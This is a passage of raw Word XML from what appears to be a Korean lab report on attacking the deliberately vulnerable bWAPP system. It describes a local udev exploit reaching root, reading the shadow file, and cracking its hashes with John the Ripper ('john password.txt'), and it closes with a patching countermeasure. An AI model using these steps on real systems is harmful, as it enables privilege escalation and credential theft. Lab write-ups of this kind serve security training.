        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PPID)</w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>로 하여금 최상위 권한으로 부여받아 실행되고 있는것을 확인할 수 있다.</w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E11D97D" w14:textId="65621223" w:rsidR="00A24049" w:rsidRDefault="00DF1BF8" w:rsidP="004A6E64">
      <w:pPr>
        <w:ind w:left="6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E31640C" wp14:editId="5DAF5B44">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1565846</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>295910</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="467483" cy="180735"/>
                <wp:effectExtent l="19050" t="19050" r="27940" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="1055" name="직사각형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3" cy="180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BE536" id="직사각형 1055" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:123.3pt;margin-top:23.3pt;width:36.8pt;height:14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" filled="f" strokecolor="#c00000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801BB03" wp14:editId="37703138">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1074484</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>142240</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="480412" cy="180735"/>
                <wp:effectExtent l="19050" t="19050" r="15240" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="1054" name="직사각형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12" cy="180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456BD" id="직사각형 1054" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:84.6pt;margin-top:11.2pt;width:37.85pt;height:14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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004A6E64" w:rsidRPr="004A6E64">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E4C9FB8" wp14:editId="2DC64B32">
            <wp:extent cx="5760000" cy="627543"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="20320"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27543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0715CB" w14:textId="23419796" w:rsidR="002F2FBD" w:rsidRDefault="00F8104B" w:rsidP="00F8104B">
      <w:pPr>
        <w:ind w:left="600"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/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26611555" wp14:editId="757C2E6D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772275" cy="10030460"/>
                <wp:effectExtent l="0" t="0" r="9525" b="8890"/>
                <wp:wrapNone/>
                <wp:docPr id="1036" name="직사각형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0030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AE30C" id="직사각형 1036" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:533.25pt;height:789.8pt;z-index:-2515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  <w:r w:rsidR="004A6E64" w:rsidRPr="004A6E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>exploit payload</w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">라는 </w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tmp </w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">경로에서 </w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PPID</w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">가 </w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2861</w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">으로 부여되었던 프로세스 </w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PID</w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>를 실행하고 있는것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFAFA25" w14:textId="2B4D356B" w:rsidR="004A6E64" w:rsidRDefault="00DF1BF8" w:rsidP="004A6E64">
      <w:pPr>
        <w:ind w:left="600" w:firstLineChars="100" w:firstLine="2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C070B0F" wp14:editId="2F9559E1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4203006</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>269138</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1341024" cy="203787"/>
                <wp:effectExtent l="19050" t="19050" r="12065" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="1056" name="직사각형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24" cy="2037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DFCBD" id="직사각형 1056" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:330.95pt;margin-top:21.2pt;width:105.6pt;height:16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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004A6E64" w:rsidRPr="004A6E64">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64CDB642" wp14:editId="08A20A04">
            <wp:extent cx="5760000" cy="600009"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="10160"/>
            <wp:docPr id="1029" name="그림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7713"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="600009"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9522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F2829" w14:textId="2145B608" w:rsidR="004A6E64" w:rsidRDefault="004A6E64" w:rsidP="004A6E64">
      <w:pPr>
        <w:ind w:left="600" w:firstLineChars="100" w:firstLine="200"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A650B5B" w14:textId="33967E6D" w:rsidR="004A6E64" w:rsidRDefault="004A6E64" w:rsidP="004A6E64">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">9) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>관리자 권한 획득</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7CFA62" w14:textId="3DFC3B9F" w:rsidR="004A6E64" w:rsidRDefault="004A6E64" w:rsidP="004A6E64">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004A6E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F2FBD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="002F2FBD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>AC(User Access Control)</w:t>
      </w:r>
      <w:r w:rsidR="002F2FBD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>을 우회하여 관리자 권한으로 구동</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C13D8" w14:textId="1088054D" w:rsidR="004A6E64" w:rsidRDefault="004A6E64" w:rsidP="004A6E64">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004A6E64">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7812C0E8" wp14:editId="2DC84468">
            <wp:extent cx="5760000" cy="910906"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="22860"/>
            <wp:docPr id="1031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5E6EE153-4A31-4F7C-BD8A-293A0506D5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5E6EE153-4A31-4F7C-BD8A-293A0506D5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1"/>
                    <a:srcRect b="82404"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="910906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8ACDD" w14:textId="4F4C58F8" w:rsidR="002F2FBD" w:rsidRDefault="002F2FBD" w:rsidP="004A6E64">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002F2FBD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">shaodw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">파일 획득 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4019D6" w14:textId="3EFE0958" w:rsidR="002F2FBD" w:rsidRDefault="002F2FBD" w:rsidP="002F2FBD">
      <w:pPr>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F2FBD">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D2BFD92" wp14:editId="14BF8771">
            <wp:extent cx="5760000" cy="2340277"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="22225"/>
            <wp:docPr id="1032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5E6EE153-4A31-4F7C-BD8A-293A0506D5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5E6EE153-4A31-4F7C-BD8A-293A0506D5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1"/>
                    <a:srcRect t="16581"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="2340277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95A59" w14:textId="528AA29D" w:rsidR="002F2FBD" w:rsidRDefault="002F2FBD" w:rsidP="002F2FBD">
      <w:pPr>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2FBD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>‘password.txt’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 이름으로 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bWAPP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">hadow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>내용 생성</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D46A4" w14:textId="0219FC2C" w:rsidR="00F8104B" w:rsidRDefault="00F8104B" w:rsidP="00F8104B">
      <w:pPr>
        <w:ind w:firstLineChars="600" w:firstLine="1200"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>i password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176336F2" w14:textId="66289216" w:rsidR="002F2FBD" w:rsidRDefault="002F2FBD" w:rsidP="002F2FBD">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="1000" w:hangingChars="400" w:hanging="80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</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2FBD">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2496B431" wp14:editId="3446B7A5">
            <wp:extent cx="5760000" cy="2743813"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="19050"/>
            <wp:docPr id="1033" name="그림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43813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7932E7" w14:textId="662968A8" w:rsidR="00374687" w:rsidRDefault="00F8104B" w:rsidP="00F8104B">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="200" w:firstLineChars="200" w:firstLine="760"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/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3ECD55F1" wp14:editId="75149FA2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>-165206</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6772275" cy="10198938"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1037" name="직사각형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01989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7A79F" id="직사각형 1037" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:-13pt;width:533.25pt;height:803.05pt;z-index:-25150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  <w:r w:rsidRPr="00F8104B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>④</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 존리퍼 툴을 사용하여 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bWAPP shadow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">패스워드 크랙 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28247526" w14:textId="62E504F4" w:rsidR="00F8104B" w:rsidRDefault="00F8104B" w:rsidP="002F2FBD">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="1000" w:hangingChars="400" w:hanging="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ohn password.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE6863" w14:textId="0FA5CFF4" w:rsidR="004A6E64" w:rsidRDefault="00DF1BF8" w:rsidP="00F8104B">
      <w:pPr>
        <w:ind w:firstLineChars="500" w:firstLine="10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27747E" wp14:editId="31923504">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>652844</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1496695</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1456284" cy="219155"/>
                <wp:effectExtent l="19050" t="19050" r="10795" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="1057" name="직사각형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84" cy="219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ABF63" id="직사각형 1057" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:51.4pt;margin-top:117.85pt;width:114.65pt;height:17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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002F2FBD" w:rsidRPr="002F2FBD">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F3F9940" wp14:editId="46816C54">
            <wp:extent cx="5760000" cy="2016495"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="22225"/>
            <wp:docPr id="1034" name="그림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16495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0841EB" w14:textId="34B98E76" w:rsidR="00F8104B" w:rsidRPr="00F8104B" w:rsidRDefault="00F8104B" w:rsidP="00F8104B">
      <w:pPr>
        <w:rPr>
          <w:b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F8104B" w14:paraId="3A81C842" w14:textId="77777777" w:rsidTr="005E13EB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D7A5E55" w14:textId="4855065F" w:rsidR="00F8104B" w:rsidRPr="00F8104B" w:rsidRDefault="00F8104B" w:rsidP="005E13EB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F8104B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 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F8104B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 3. </w:t>
            </w:r>
            <w:r w:rsidRPr="00F8104B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대응방안 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63223B07" w14:textId="1A51D491" w:rsidR="00A24049" w:rsidRPr="00F8104B" w:rsidRDefault="00B8468F" w:rsidP="00F8104B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">이전의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">udev </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>취약버전을 사용하지 않고,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F8104B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>최신 버전으로</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>패치</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070B24B8" w14:textId="51DD1D27" w:rsidR="00CC3B11" w:rsidRDefault="00CC3B11" w:rsidP="00CC3B11"/>
    <w:sectPr w:rsidR="00CC3B11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4B9B6" w14:textId="77777777" w:rsidR="00100D55" w:rsidRDefault="00100D55" w:rsidP="000D6EBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1C299FC3" w14:textId="77777777" w:rsidR="00100D55" w:rsidRDefault="00100D55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나눔스퀘어_ac">
    <w:altName w:val="맑은 고딕"/>
    <w:charset w:val="81"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000000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00000000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F1246" w14:textId="77777777" w:rsidR="00100D55" w:rsidRDefault="00100D55" w:rsidP="000D6EBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3D71DA4D" w14:textId="77777777" w:rsidR="00100D55" w:rsidRDefault="00100D55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414C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21FE893C"/>
    <w:lvl w:ilvl="0" w:tplc="73EED1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92" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="AA308102">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircle"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1636" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="857203CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircle"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1986" w:hanging="36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426" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="280A6A04">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2786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43F07A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF9EBDA4"/>
    <w:lvl w:ilvl="0" w:tplc="7F9600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DD29F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EACA302"/>
    <w:lvl w:ilvl="0" w:tplc="52AC0C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DA0C3A8">
      <w:start w:val="3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8DA0C3A8">
      <w:start w:val="3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756C1F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74E6154E"/>
    <w:lvl w:ilvl="0" w:tplc="2F7877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F26794"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D1E42B4"/>
    <w:lvl w:ilvl="0" w:tplc="C3926F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44060BB8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680FDE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8ECC178"/>
    <w:lvl w:ilvl="0" w:tplc="6FEE9648">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="204237DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1B641C6"/>
    <w:lvl w:ilvl="0" w:tplc="784EA754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213C2567"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A54FE90"/>
    <w:lvl w:ilvl="0" w:tplc="D9D44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22526022"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D35CFAD2"/>
    <w:lvl w:ilvl="0" w:tplc="D15C46D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircle"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1494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23825BF3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D75C89C4"/>
    <w:lvl w:ilvl="0" w:tplc="67049DA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AF0A44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8514B05E"/>
    <w:lvl w:ilvl="0" w:tplc="2E502AB4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BB4C3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC304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160" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1560" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1960" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2360" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2760" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3160" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3560" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8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4671E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32AEB872"/>
    <w:lvl w:ilvl="0" w:tplc="5E2C4AD4">
      <w:start w:val="4"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2DFB2E89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89089CCE"/>
    <w:lvl w:ilvl="0" w:tplc="2CA2978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F3A0B90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D35CFAD2"/>
    <w:lvl w:ilvl="0" w:tplc="D15C46D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircle"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1494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32C61743"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC304964"/>
    <w:lvl w:ilvl="0" w:tplc="92705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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="35BC2BBC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F801FFA"/>
    <w:lvl w:ilvl="0" w:tplc="295C370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9DCA9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D3CA7D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DD6579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96402C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AC0A6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630B6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ED885D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58E658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0E7BF3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B27811E0"/>
    <w:lvl w:ilvl="0" w:tplc="0D04A3D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5907AC4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BDBEB022"/>
